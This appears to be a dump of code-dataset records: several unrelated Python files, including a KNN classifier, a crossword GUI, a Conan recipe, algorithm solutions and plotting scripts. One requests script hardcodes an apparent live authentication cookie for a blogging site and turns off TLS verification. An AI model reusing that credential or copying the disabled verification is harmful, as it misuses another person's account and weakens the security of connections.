= np.bincount(res[i], weights=weights[i])\n            else:\n                count = np.bincount(res[i])\n            predict[i] = np.argmax(count)\n        return predict\n","sub_path":"Метрические алгоритмы классификации/nearest_neighbors.py","file_name":"nearest_neighbors.py","file_ext":"py","file_size_in_byte":2980,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"}
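A small usage sketch for the KNNClassifier above (synthetic data; the 'my_own' strategy would additionally require the local distances module):

    import numpy as np

    X_train = np.random.rand(100, 5)
    y_train = np.random.randint(0, 3, size=100)
    X_test = np.random.rand(10, 5)

    clf = KNNClassifier(k=3, strategy='brute', metric='euclidean',
                        weights=True, test_block_size=50)
    clf.fit(X_train, y_train)
    print(clf.predict(X_test))   # one predicted class per test row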
 +{"seq_id":"654472574","text":"# Instructions to run--------------------------------------------------------------------------------------\n# In Ubuntu/Linux:\n# Make sure python3 and Mozilla Firefox are installed in your environment\n# Open a terminal in the directory this file is located in\n# Type: python3 guiFinal.py\n# Instructions to run --------------------------------------------------------------------------------------\n\n# @desc: This program creates a GUI from the data given by the file \"file.txt\"\n#        Just rename the data to \"file.txt\" and type make data in the terminal\n#\n# @author: APOLLO\n# @date: 21/04/2020\n# @version: v2.0\n#\n\n# Import the tkinter library for the gui\nimport tkinter as tk\nimport time\nimport datetime\n\ncellSize = 75\n# Creating the grid table of the puzzle\ndef createTable():\n    i = 0\n    while i <= 5 * cellSize:\n        j = 0\n        while j <= 5 * cellSize:\n            # each cell spans from (i, j) to (i + cellSize, j + cellSize)\n            W.create_rectangle(i, j, i + cellSize, j + cellSize, outline='black')\n            j += cellSize\n        i += cellSize\n    return\n\n# Marking numbers based on clues\nnumSize = 15\ndef markNum(j, i, num):\n    x = cellSize * i + 10\n    y = cellSize * j + 12\n    W.create_text(x, y, font=(\"Arial\", numSize), text=num)\n    return\n\n# Writing letters in cells\nletterSize = 30\ndef markLetter(j, i, letter):\n    x = cellSize * i + 35\n    y = cellSize * j + 40\n    W.create_text(x, y, font=(\"Arial\", letterSize), text=letter)\n    return\n\n# Marking black cells\ndef markBlack(col, row):\n    W.create_rectangle(col * cellSize, row * cellSize, col * cellSize + cellSize, row * cellSize + cellSize, fill='black')\n    return\n\ntextWidth = 350\n# Printing Across clues\ndef createAcross():\n    X.create_text(130, 50, font=('Arial', 40), text='Across')\n    j = 0\n    for i in acrossClues:\n        X.create_text(30, 100 + j, font=('Arial', 12), anchor='w', text=i + \": \" + acrossClues[i], width=textWidth)\n        j += 40\n    return\n\n# Printing Down clues\ndef createDown():\n    X.create_text(450, 50, font=('Arial', 40), text='Down')\n    j = 0\n    for i in downClues:\n        X.create_text(350, 100 + j, font=('Arial', 12), anchor='w', text=i + \": \" + downClues[i], width=textWidth)\n        j += 40\n    return\n\nfile = open(\"file.txt\")\ncontent = file.read()\n\n# MAIN Method - Making the GUI ----------------------------------------------------------\n# Making the main crossword window\nwindow = tk.Tk()\nwindow.title(\"New York Times Mini Puzzle - Demo 1\")  # Window title\n\n# Creating a canvas and making a crossword structure\nW = tk.Canvas(window, width=cellSize * 5, height=cellSize * 5, highlightbackground='black')\nW.place(x=100, y=170)\ncreateTable()  # Print a 5x5 table\n\n# Name of the group as a tk label\ntk.Label(window, font=(\"Arial\", 20), text=\"APOLLO\", bg='black', fg='white').place(y=100, x=80)\n\n# Print the current date and time\ncurrentDT = datetime.datetime.now()\ntk.Label(window, font=(\"Arial\", 20), text=str(currentDT)[0:16], bg='black', fg='white',).place(y=570, x=180)\n\n# Puzzle Iteration ----------------------------------------------------------------------------------\n# While loop to iterate over each letter in the puzzle\ni = 0\nwhile i < 25:\n    # Find the first cell using its cell id\n    indexLetter = 'id=\"cell-id-' + str(i) + '\"'\n    index = content.find(indexLetter)\n    letter = content[index + (len(indexLetter) + 8):index + (len(indexLetter) + 18)]\n\n    # Find the empty cell and mark it black\n    if letter == 'Cell-block':\n        row = int(i / 5)\n        col = i % 5\n        markBlack(col, row)  # Mark cell black given cell coordinates\n        i += 1\n        continue\n    # If not a black cell, continue with other options\n    else:\n        # Find the index for the letter in the cell\n        index2 = content.find('text-anchor=\"middle\"', index)\n        indexStart = content.find('text-anchor=\"start\"', index, index2)\n        # If the cell has a number, then print the number on the top left corner\n        if indexStart != (-1):\n            indexNumber = content.find(\"</text>\", indexStart)\n            letterNumber = content[indexNumber + 7]\n            markNum(int(i / 5), (i % 5), letterNumber)\n        index3 = content.find('</text>', index2)\n        # mainletter holds the letter in the cell\n        mainletter = content[index3 - 1]\n        # Print the letter in the center of the cell\n        markLetter(int(i / 5), (i % 5), mainletter)\n        i += 1\n\n# Clues Section ----------------------------------------------------------------------------\n# Create a canvas for the clues\nX = tk.Canvas(window, height=300, width=700, highlightbackground='black')\nX.pack(padx=50, side='right')  # 
Position the clues section canvas at the right side of the screen\n\n# ACROSS SECTION --------------------------------------------------------------------------\n# Store the clues in a dictionary: the key is the clue number, the value is the clue itself\nacrossClues = dict()\nindex = content.find(\"Across\")\nindex2 = content.find(\"</span>\", index)\nj = 0\n# Find each clue and append it to the 'acrossClues' dictionary\nwhile j < 5:\n    clueNumber = content[index2 - 1]\n    indexStart = content.find(\">\", index2 + 8)\n    indexEnd = content.find(\"<\", indexStart)\n    acrossClues[clueNumber] = content[indexStart + 1:indexEnd]\n    index2 = content.find(\"</span>\", indexEnd + 10)\n    j += 1\ncreateAcross()  # Print the across clues section\n\n# DOWN SECTION -----------------------------------------------------------------------------\n# Store the clues in a dictionary: the key is the clue number, the value is the clue itself\ndownClues = dict()\nindex = content.find(\"Down\", indexEnd)\nindex2 = content.find(\"</span>\", index)\nk = 0\n# Find each clue and append it to the 'downClues' dictionary\nwhile k < 5:\n    clueNumber = content[index2 - 1]\n    indexStart = content.find(\">\", index2 + 8)\n    indexEnd = content.find(\"<\", indexStart)\n    downClues[clueNumber] = content[indexStart + 1:indexEnd]\n    index2 = content.find(\"</span>\", indexEnd + 10)\n    k += 1\ncreateDown()  # Print the down clues section\n\n# Size of the window\nwindow.geometry(\"1366x768\")\n# Main loop runs the GUI itself\nwindow.mainloop()\n","sub_path":"firstDemo/generateData.py","file_name":"generateData.py","file_ext":"py","file_size_in_byte":6091,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"615927004","text":"# -*- coding: utf-8 -*-\n\nfrom conans import ConanFile, CMake, tools\nimport os\nimport re\nimport subprocess\nimport sys\nfrom packaging import version\nfrom pathlib import Path\n\nclass HDILibConan(ConanFile):\n    name = \"HDILib\"\n    default_version = \"1.0.0-alpha1\"\n    description = \"HDILib is a library for the scalable analysis of large and high-dimensional data.\"\n    topics = (\"embedding\", \"analysis\", \"n-dimensional\", \"tSNE\")\n    url = \"https://github.com/biovault/HDILib\"\n    author = \"B. van Lew <b.van_lew@lumc.nl>\"  # conanfile author\n    license = \"MIT\"  # License for packaged library; please use SPDX Identifiers https://spdx.org/licenses/\n    default_user = \"lkeb\"\n    default_channel = \"stable\"\n\n    generators = \"cmake\"\n\n    # Options may need to change depending on the packaged library\n    settings = \"os\", \"build_type\", \"compiler\", \"arch\"\n    options = {\"shared\": [True, False], \"fPIC\": [True, False]}\n    default_options = {\"shared\": True, \"fPIC\": True}\n\n    scm = {\n        \"type\": \"git\",\n        \"url\": \"https://github.com/biovault/HDILib.git\",\n        \"submodule\": \"recursive\"\n    }\n    exports = \"hdi*\", \"CMakeLists.txt\", \"LICENSE\"\n\n    # Flann builds are a bit complex, and certain versions fail with\n    # certain platform and compiler combinations. 
Hence use\n    # either the self-built 1.8.5 for Windows or the system-supplied\n    # 1.8.4 on Linux and macOS\n\n    # Set version based on branch according to the following:\n    #\n    # master           - gets version \"latest\"\n    # release/x.y.z    - gets version \"x.y.z\"\n    # feature/blahblah - gets version \"blahblah\"\n    # otherwise the hardcoded self.version is used\n    def set_version(self):\n        ci_branch = os.getenv(\"CONAN_HDILIB_CI_BRANCH\", \"master\")\n\n        print(\"Building branch: \", ci_branch)\n        rel_match = re.compile(\"release/(\\d+\\.\\d+.\\d+)(.*)\")\n        feat_match = re.compile(\"feature/(.*)\")\n\n        if ci_branch == \"master\":\n            self.version = \"latest\"\n        else:\n            rel = rel_match.search(ci_branch)\n            if rel is not None:\n                self.version = rel.group(1) + rel.group(2)\n            else:\n                feat = feat_match.search(ci_branch)\n                if feat is not None:\n                    self.version = feat.group(1)\n        self.scm[\"revision\"] = ci_branch\n\n    def _get_python_cmake(self):\n        if None is not os.environ.get(\"APPVEYOR\", None):\n            pypath = Path(sys.executable)\n            cmakePath = Path(pypath.parents[0], \"Scripts/cmake.exe\")\n            return cmakePath\n        return \"cmake\"\n\n    def system_requirements(self):\n        if tools.os_info.is_macos:\n            target = os.environ.get('MACOSX_DEPLOYMENT_TARGET', '10.13')\n            if version.parse(target) > version.parse('10.12'):\n                installer = tools.SystemPackageTool()\n                installer.install('libomp')\n\n    def requirements(self):\n        if self.settings.os == \"Windows\":\n            self.requires(\"flann/1.8.5@lkeb/stable\")\n        else:\n            # Linux and macOS use flann 1.8.4\n            self.requires(\"flann/1.8.4@lkeb/stable\")\n\n    def config_options(self):\n        if self.settings.os == 'Windows':\n            del self.options.fPIC\n\n    def _configure_cmake(self, build_type):\n        # Inject the conan dependency paths into the CMakeLists.txt\n        conanproj = (\"PROJECT(${PROJECT})\\n\"\n                     \"include(${CMAKE_BINARY_DIR}/conanbuildinfo.cmake)\\n\"\n                     \"conan_basic_setup()\\n\"\n                     )\n        tools.replace_in_file(\"CMakeLists.txt\", \"PROJECT(${PROJECT})\", conanproj)\n        if self.settings.os == \"Macos\":\n            cmake = CMake(self, generator='Xcode', build_type=build_type)\n        else:\n            cmake = CMake(self, build_type=build_type)\n        if self.settings.os == \"Windows\" and self.options.shared:\n            cmake.definitions[\"CMAKE_WINDOWS_EXPORT_ALL_SYMBOLS\"] = True\n        if self.settings.os == \"Linux\" or self.settings.os == \"Macos\":\n            cmake.definitions[\"CMAKE_CXX_STANDARD\"] = 14\n            cmake.definitions[\"CMAKE_CXX_STANDARD_REQUIRED\"] = \"ON\"\n        cmake.definitions[\"HDI_EXTERNAL_FLANN_INCLUDE_DIR\"] = \"${CONAN_INCLUDE_DIRS_FLANN}\"\n        cmake.definitions[\"HDI_USE_ROARING\"] = \"OFF\"\n        cmake.definitions[\"HDILib_VERSION\"] = self.version\n        print(f\"Set version to {self.version}\")\n        cmake.configure()\n        cmake.verbose = True\n        return cmake\n\n    def build(self):\n\n        install_dir = Path(self.build_folder).joinpath(\"install\")\n        install_dir.mkdir(exist_ok=True)\n        config = str(self.settings.build_type)\n        print(f\"Installing Debug and Release builds to {install_dir}\")\n        cmakepath = self._get_python_cmake()\n\n        cmake_debug = self._configure_cmake('Debug')\n        cmake_debug.build()\n        result = subprocess.run([f\"{str(cmakepath)}\",\n                                 \"--install\", self.build_folder,\n                                 \"--config\", \"Debug\",\n                                 \"--verbose\",\n                                 \"--prefix\", str(install_dir)], capture_output=True)\n\n        cmake_release = self._configure_cmake('Release')\n        cmake_release.build()\n        result = subprocess.run([f\"{str(cmakepath)}\",\n                                 \"--install\", self.build_folder,\n                                 \"--config\", \"Release\",\n                                 \"--verbose\",\n                                 \"--prefix\", str(install_dir)], capture_output=True)\n\n\n        print(f\"Install for {config} build - 
complete. \\n Output: {result.stdout} \\n Errors: {result.stderr}\")\n\n    def package(self):\n        install_dir = Path(self.build_folder).joinpath(\"install\")\n        self.copy(pattern=\"*\", src=str(install_dir))\n\n    def package_info(self):\n        self.cpp_info.libs = tools.collect_libs(self)\n","sub_path":"conanfile.py","file_name":"conanfile.py","file_ext":"py","file_size_in_byte":5737,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"122321810","text":"from typing import List\n\n\nclass Solution:\n    def numOfMinutes(self, n: int, headID: int, manager: List[int], informTime: List[int]) -> int:\n        def make_adj_list(manager):\n            adj_list = [[] for i in manager]\n\n            for index, val in enumerate(manager):\n                if val != -1:\n                    adj_list[val].append(index)\n\n            return adj_list\n\n        # we want to traverse the adj_list, add up the cost of the dfs walks from the root, and return the max\n        # max_time is the max cost of the dfs traversal\n        def dfs(vertex, seen, adj_list, inform_time, max_time) -> int:\n\n            if not adj_list[vertex]:\n                return 0\n            seen.add(vertex)\n            max_time = 0\n            for emp in adj_list[vertex]:\n                if emp not in seen:\n                    max_time = max(max_time, dfs(emp, seen, adj_list, inform_time, max_time))\n            return max_time + inform_time[vertex]\n\n        if n == 1:\n            return 0\n        adj_list = make_adj_list(manager)\n        seen = set()\n        max_time = dfs(headID, seen, adj_list, informTime, 0)\n        return max_time\n\n\n    # We were close at first; the early attempt simply added too much to the answer.\n    # The key is deciding what each recursive call must compute and what its return statement should carry.\n\n    # There is one base case: an employee with no subordinates contributes zero time.\n    # Those return values are sifted up the tree: for every node, once the recursion unwinds, we know the\n    # max inform time among its children and pass that (plus the node's own inform time) upward.\n    # A dfs return statement is essentially \"what this subtree's traversal has learned so far\".\n\n    # We also did not need a seen set, because the manager structure is a tree (acyclic).\n\n    # In general, a dfs solution has a base-case return and a post-recursion return that sifts\n    # the computed values back up.\n","sub_path":"Graphs/emp_inform_time.py","file_name":"emp_inform_time.py","file_ext":"py","file_size_in_byte":2179,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"}
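A condensed sketch of the same idea as the solution above — on a tree no seen set is needed, and each call returns the slowest chain below its node:

    from typing import List

    def num_of_minutes(n: int, head_id: int, manager: List[int], inform_time: List[int]) -> int:
        children = [[] for _ in range(n)]
        for emp, boss in enumerate(manager):
            if boss != -1:
                children[boss].append(emp)

        def dfs(v: int) -> int:
            # time until the news reaches the deepest subordinate under v
            return inform_time[v] + max((dfs(c) for c in children[v]), default=0)

        return dfs(head_id)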
with open(temp_path, 'w') as f:\n # write to the file\n f.write('test')\n # confirm the file exists (prints True)\n print(os.path.exists(temp_path))\n\n# the temporary directory has already been removed at this point, so this prints False\nprint(os.path.exists(temp_path))\n","sub_path":"advanced_library/sample_tempfile.py","file_name":"sample_tempfile.py","file_ext":"py","file_size_in_byte":526,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"357322320","text":"# -*- coding: utf-8 -*-\nimport sys\nimport os\n\n# add zip-files in codeaide.lib to sys.path\nimport codeaide.lib\n\n# i18n-support\nimport gettext\n\n\n\nshare_path = os.path.abspath(os.path.join(__file__, \"..\", \"..\"))\nlocale_path = os.path.join(share_path, \"locale\")\nicon_path = os.path.join(share_path, \"icons\")\nicon_theme = \"oxygen\" # gnome\ngettext.bindtextdomain(\"codeaide\", locale_path)\ngettext.textdomain(\"codeaide\")\ngettext.bind_textdomain_codeset(\"codeaide\", \"utf-8\")\n\n\nDEBUG = os.environ.get(\"CODEAIDE_DEBUG\", \"0\").lower() in (\"yes\", \"1\", \"true\")\n\n\nmode_settings = {\n \"line_numbers\": \"LineNumbers\", # sidebar\n \"line_status\": \"LineStatus\", # sidebar\n \"block_selection\": \"BlockSelection\", # editextras\n \"autotyping\": \"AutoTyping\", # autotyping\n \"whitespace\": \"Whitespace\", # visualhelper\n \"highlight_current_line\": \"HighlightLine\", # visualhelper\n \"wrap_indicator\": \"WrapIndicator\", # visualhelper\n \"paren_matcher\": \"ParentheseMatcher\", # parenmatcher\n \"occurrences\": \"Occurrences\" # occurrences\n}","sub_path":"used srcs/codeaide_editor/codeaide/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1092,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"416724521","text":"# -*- coding: utf-8 -*-\nimport requests\nimport urllib3\n\nurllib3.disable_warnings()\n\n'''\nse=requests.session()\nse.get(\"http://zzk.cnblogs.com/s\")\n\nr=se.get(\"http://zzk.cnblogs.com/s/blogpost?Keywords=https \")\nprint(r.text)\nprint(r.status_code)\nprint(r.url)\n'''\n\nurl = \"https://passport.cnblogs.com/user/signin\"\n\nheader = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0'\n }\n\n# r = requests.post(url, json=payload, headers=headers,verify=False)\n# revised version below\ns = requests.session()\ns.get(url)\nr = s.get(url, headers=header, verify=False)\nprint(s.cookies)\nprint(s.cookies.get_dict())\n\nc = requests.cookies.RequestsCookieJar() # create a cookie jar and add cookies to it\n# c.set('CNBlogsCookie','B270816A100FB0931A371F0E6F33ED52E5583102E6035A8C7583EFF6CEC81EDA506A163962338236149ADEBD58291AB41CE8AF383E0DDE35F747E4835D23735DB8CD49DF3F34389FE9136637C3309A0AE74E7144')\n# c.set('Cnblogs.AspNetCore.Cookies', 'CfDJ8Gf3jjv4cttDnEy2UYRcGZ0Nd5CIWlAssetUhiccTVpfE-ZzCQDRyjghnv6Oe-M6ywHpOHdmsZ_V5YU172EyOlu6PYfSEb0coMGpggc9TZylV0roB4cwidqwK1dYugggq7O2BoEsrbgR1m966dntV9YkdyDlm1MTHRLSCsAforgf4BMaSe0N9WskZF-lhGvZ50jlyIc82PDQCezsimoV_Q0tzX23bBcrvEIzB96VL_uz4PjzLy0DwAHNYyGQglDIdcODEilHcQrl3zId5es6lGrAqyywXypcZzQyCcch7sOG')\n# c.set('AlwaysCreateItemsAsActive','True')\n# c.set('AdminCookieAlwaysExpandAdvanced','True')\n# c.set('_gid','GA1.2.962725249.1526279279')\n# 
c.set('_ga','GA1.2.360862112.1525779126')\nc.set('.CNBlogsCookie','2C1A386DF5B7DF22657CEE86256E1CA5D3CCB3397E03D2C4B4AC7022C1A77D981C8F7E8F7DF7EC6C9BC3C6550035873CCE9006FCD09F7BEAE9E2AC4463E3463479801000CCA68A17876DC4C556022A04790E06FC')\n#c.set('.Cnblogs.AspNetCore.Cookies','CfDJ8Gf3jjv4cttDnEy2UYRcGZ3V-rLd-acavpBrdNW7N0zpa_E9zJHWdHwly7NSAPUN7CQyQWrXblOzJCZVJsRbRhaLiHG1grT4frfzLCaeGzVQorJfB6W-fdZwwH888Li9xOVyqDme-qa52PWbEIdF-5dvdooww1SAwNhGMR5yPi7vBKxTsOl-PZc-2CNeulfmIXPGPL5_dTP_wPfiqE1UG6T8bC1_Bx2_5xHsS07Nt7PX68u2SF4oMd4GHvCQ0jaxbPbGDkRD9UIQTGJirCV7SuPwJGDI8wBmWsD6LfC7hTIY')\n \ns.cookies.update(c) # merge the cookies into the session's cookie jar\n \nprint(s.cookies)\nprint(s.cookies.get_dict())\n\nurl1= \"https://i.cnblogs.com/EditPosts.aspx?opt=1\"\n \nr1 = s.get(url1, headers=header, verify=False)\nprint(r1.text)\nprint(r1.status_code)\n\n\n\n\n\n\n\n\n","sub_path":"interface/src/test/test_session.py","file_name":"test_session.py","file_ext":"py","file_size_in_byte":2271,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"291698734","text":"import sys\n\nf_input = open(sys.argv[1])\n#problems = int(f_input.readline().rstrip())\n\ndef checkwin(board):\n def checkline(score):\n if score>3:\n return \"X won\"\n elif score<0:\n return None\n elif score<1:\n return \"O won\"\n else:\n return None\n \n for i in xrange(4):\n if not checkline(sum(board[i])) is None:\n return checkline(sum(board[i]))\n for i in xrange(4):\n if not checkline(sum([row[i] for row in board])) is None:\n return checkline(sum([row[i] for row in board]))\n if not checkline(sum([board[i][i] for i in xrange(4)])) is None:\n return checkline(sum([board[i][i] for i in xrange(4)]))\n if not checkline(sum([board[i][-(i+1)] for i in xrange(4)])) is None:\n return checkline(sum([board[i][-(i+1)] for i in xrange(4)]))\n\n ## draw or not complete ##\n if sum([sum(line) for line in board])>0:\n return \"Draw\"\n else:\n return \"Game has not completed\"\n \n \ndef transrate(character):\n if character == \"X\":\n return 1\n elif character == \"O\":\n return 0\n elif character == \"T\":\n return 0.5\n elif character == \".\":\n return -20\n \n\nlinenums = int(f_input.readline().rstrip())\nfor i in xrange(linenums):\n board = []\n for j in xrange(4):\n board.append([transrate(c) for c in f_input.readline().rstrip()])\n f_input.readline()\n sys.stdout.write(\"Case #\"+str(i+1)+\": \"+checkwin(board)+\"\\n\")\n\n\n","sub_path":"solutions_python/Problem_116/814.py","file_name":"814.py","file_ext":"py","file_size_in_byte":1526,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"271850843","text":"#Gorokhova Olena KNIT 16-A\r\n# given s, the name of a country, print the name of its continent\r\nk = True\r\nwhile k:\r\n from enum import Enum\r\n class country(Enum):\r\n Germany = 1\r\n Cuba = 2\r\n Laos = 3\r\n Monaco = 4\r\n Bangladesho = 5\r\n Ukraine = 6\r\n class continent(Enum):\r\n Asia = 1\r\n America = 2\r\n Europe = 3\r\n try:\r\n Asia = country.Bangladesho, country.Laos\r\n America = country.Cuba\r\n Europe = country.Germany, country.Monaco\r\n s = country[input('country: ')]\r\n except (ValueError, KeyError):\r\n print('wrong value or key')\r\n for i in Asia:\r\n if i == s:\r\n print(continent.Asia.name)\r\n for i in Europe:\r\n if i == s:\r\n print(continent.Europe.name)\r\n if America == s:\r\n print(continent.America.name)\r\n while True:\r\n L = input(\"continue? 
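The test_session record above shows the pattern of building a RequestsCookieJar by hand and merging it into a live session so that later requests carry the cookies. A minimal sketch of that pattern; the cookie name and value here are placeholders, not real credentials, and the final request is left commented out to avoid a network dependency:

import requests

s = requests.session()
jar = requests.cookies.RequestsCookieJar()
# Add whatever auth cookies the target site expects (placeholder below).
jar.set("session_id", "PLACEHOLDER_VALUE")
s.cookies.update(jar)   # merge the jar into the session's cookies
# Every subsequent request on this session now carries the cookie:
# r = s.get("https://example.com/protected")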
1 - yes, 2 - no: \")\r\n if L == \"1\":\r\n break\r\n elif L == \"2\":\r\n k = False\r\n print(\"bye\\n\")\r\n break\r\n","sub_path":"laba 1/laba 1 _13.py","file_name":"laba 1 _13.py","file_ext":"py","file_size_in_byte":1066,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"295088227","text":"from django.contrib import admin\n\nfrom .models import (\n Activity,\n ActivityMedia,\n Organization,\n OrganizationMember,\n SchoolActivityGroup,\n SchoolActivityOrder,\n)\n\n\ndef approve_order(self, request, queryset):\n for order in queryset:\n order.status = SchoolActivityOrder.Status.APPROVED\n order.save()\n\n\napprove_order.short_description = \"Approve Order\"\n\n\n@admin.register(SchoolActivityOrder)\nclass SchoolActivityOrderAdmin(admin.ModelAdmin):\n list_display = [\"school\", \"activity\", \"created_at\", \"updated_at\", \"status\"]\n actions = [approve_order]\n\n\nadmin.site.register(Organization)\nadmin.site.register(Activity)\nadmin.site.register(ActivityMedia)\nadmin.site.register(OrganizationMember)\nadmin.site.register(SchoolActivityGroup)\n","sub_path":"server/server/organizations/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":769,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"259730574","text":"# O(n + k*log(n))\nimport collections, heapq\ndef top_k_frequent_words(words, k):\n count = collections.Counter(words)\n heap = [(-freq, word) for word, freq in count.items()]\n heapq.heapify(heap)\n return [heapq.heappop(heap)[1] for i in range(k)]\n\n\nprint(top_k_frequent_words([\"love\", \"leetcode\", \"i\", \"i\", \"love\", \"coding\"], 2))\n","sub_path":"692_top_k_frequent_words.py","file_name":"692_top_k_frequent_words.py","file_ext":"py","file_size_in_byte":339,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"448171284","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.linux-x86_64/egg/sutekh/base/gui/LocalProfileEditor.py\n# Compiled at: 2019-12-11 16:37:48\n\"\"\"This handles editing the local profile (for temporary options)\"\"\"\nimport gtk\nfrom .SutekhDialog import SutekhDialog\nfrom .AutoScrolledWindow import AutoScrolledWindow\nfrom .PreferenceTable import PreferenceTable\nfrom .BaseConfigFile import FRAME\n\nclass LocalProfileEditor(SutekhDialog):\n \"\"\"Dialog which allows the user to set temporary option profiles.\n \"\"\"\n RESPONSE_CLOSE = 1\n RESPONSE_CANCEL = 2\n\n def __init__(self, oParent, oConfig, sFrame, sCardSet):\n super(LocalProfileEditor, self).__init__('Edit Local Profile', oParent, gtk.DIALOG_MODAL | gtk.DIALOG_DESTROY_WITH_PARENT)\n self.__oParent = oParent\n self.__oConfig = oConfig\n self.__sFrame = sFrame\n self.__sCardSet = sCardSet\n self.__dUnsavedChanges = None\n aOptions = []\n for sKey in self.__oConfig.profile_options(FRAME):\n if sKey == 'name':\n continue\n aOptions.append((sKey, self.__oConfig.get_option_spec(FRAME, sKey),\n True))\n\n self.__oOptionsTable = PreferenceTable(aOptions, oConfig.get_validator())\n self.vbox.pack_start(AutoScrolledWindow(self.__oOptionsTable, bUseViewport=True))\n self.set_default_size(600, 550)\n self.connect('response', self._button_response)\n self.add_button('Cancel', self.RESPONSE_CANCEL)\n self.add_button('Close', self.RESPONSE_CLOSE)\n self.show_all()\n self._repopulate_options()\n return\n\n def 
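The top-k record above notes the O(n + k*log(n)) heap approach of pushing (-frequency, word) pairs so that higher frequencies (and alphabetically earlier words on ties) pop first. For comparison, a sketch of the same result via heapq.nsmallest, which folds the heapify-and-pop loop into one call:

import collections, heapq

def top_k_frequent_words(words, k):
    count = collections.Counter(words)
    # nsmallest on (-freq, word) keeps the frequency order and the
    # alphabetical tie-break in a single call.
    return [w for _, w in heapq.nsmallest(k, ((-f, w) for w, f in count.items()))]

assert top_k_frequent_words(["love", "leetcode", "i", "i", "love", "coding"], 2) == ["i", "love"]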
_button_response(self, _oWidget, iResponse):\n \"\"\"Handle dialog response\"\"\"\n if iResponse != self.RESPONSE_CLOSE:\n self.destroy()\n return\n self._store_active_profile()\n if self._check_unsaved_changes():\n self._save_unsaved_changes()\n self.destroy()\n else:\n self.destroy()\n oDlg = LocalProfileEditor(self.__oParent, self.__oConfig, self.__sFrame, self.__sCardSet)\n oDlg.run()\n\n def _repopulate_options(self):\n \"\"\"Refresh the contents of the options box.\"\"\"\n dNewValues = {}\n dInherited = {}\n sFrame, sCardSet = self.__sFrame, self.__sCardSet\n for sKey in self.__oConfig.profile_options(FRAME):\n dNewValues[sKey] = self.__oConfig.get_local_frame_option(sFrame, sKey)\n dInherited[sKey] = self.__oConfig.get_deck_option(sFrame, sCardSet, sKey, bUseLocal=False)\n\n self.__oOptionsTable.update_values(dNewValues, {}, {}, dInherited)\n\n def _check_unsaved_changes(self):\n \"\"\"Check that none of the changes make are bad.\n\n Return True if the changes are safe for saving, False otherwise.\n \"\"\"\n return True\n\n def _save_unsaved_changes(self):\n \"\"\"Save all the unsaved changes.\"\"\"\n sFrame = self.__sFrame\n for sKey, sValue in self.__dUnsavedChanges.items():\n self.__oConfig.set_local_frame_option(sFrame, sKey, sValue)\n\n def _store_active_profile(self):\n \"\"\"Store the unsaved local profile changes.\"\"\"\n self.__dUnsavedChanges = self.__oOptionsTable.get_values()","sub_path":"pycfiles/Sutekh-1.0.0-py2.7/LocalProfileEditor.py","file_name":"LocalProfileEditor.py","file_ext":"py","file_size_in_byte":3357,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"261981610","text":"import networkx as nx\nimport matplotlib.pyplot as plt\nimport window_s_p_ft as win\nimport numpy as np\nimport math\nfrom sklearn.manifold import MDS\n\ncl = 'L'\n\ndata = win.getData(class_=cl)\ndata = sorted(data, key=lambda s: np.mean(s), reverse=True)\nstuds = win.getStudents(class_=cl)\nstuds = sorted(studs, key=lambda s: np.mean(s.grades), reverse=True)\nst_corr = np.corrcoef(data, rowvar=1)\n\nmds = MDS(n_components=2, dissimilarity='precomputed')\ndists = np.empty((len(st_corr), len(st_corr)))\nfor ii in range(len(data)):\n for jj in range(len(data)):\n dists[ii][jj] = math.sqrt(2 * (1 - st_corr[ii][jj]))\npos = mds.fit(dists).embedding_\n\nG = nx.Graph()\nG.add_nodes_from(range(len(data)))\nlabels = []\nfor ii in range(len(data)):\n labels.append(str(ii + 1) + \" \" +\n str(studs[ii].spec))\n for jj in range(ii + 1, len(data)):\n d = math.sqrt(2 * (1 - st_corr[ii][jj]))\n G.add_edge(ii, jj, weight=d)\n\nsi = []\nfor n, nbrs in G.adjacency_iter():\n w = 0\n for nbr, eattr in nbrs.items():\n w += 1 / eattr['weight']\n si.append(w)\n\n# pos = nx.spring_layout(G, k=1) # positions for all nodes\npos = {ii: p for ii, p in enumerate(pos)}\n\nfig, ax = plt.subplots(1)\n\n# nodes\nscaler = 10\nnx.draw_networkx_nodes(G, pos, node_size=[x * scaler for x in si])\n\n# edges\nmst = nx.minimum_spanning_edges(G, data=False)\nnx.draw_networkx_edges(G, pos, width=1, edgelist=list(mst))\n\n# labels; make them but dont actually draw them\nlabels = {ii: label for ii, label in enumerate(labels)}\nnx.draw_networkx_labels(G, pos, labels=labels,\n font_size=10, font_family='sans-serif')\n# labs = dict(((u, v), round(d['weight'], 2)) for u, v, d in G.edges(data=True))\n# for k in labs:\n# print(k, labs[k])\n# nx.draw_networkx_edge_labels(G, pos, edge_labels=labs, font_size=10,\n# font_family='sans-serif')\n\nplt.axis('off')\n# 
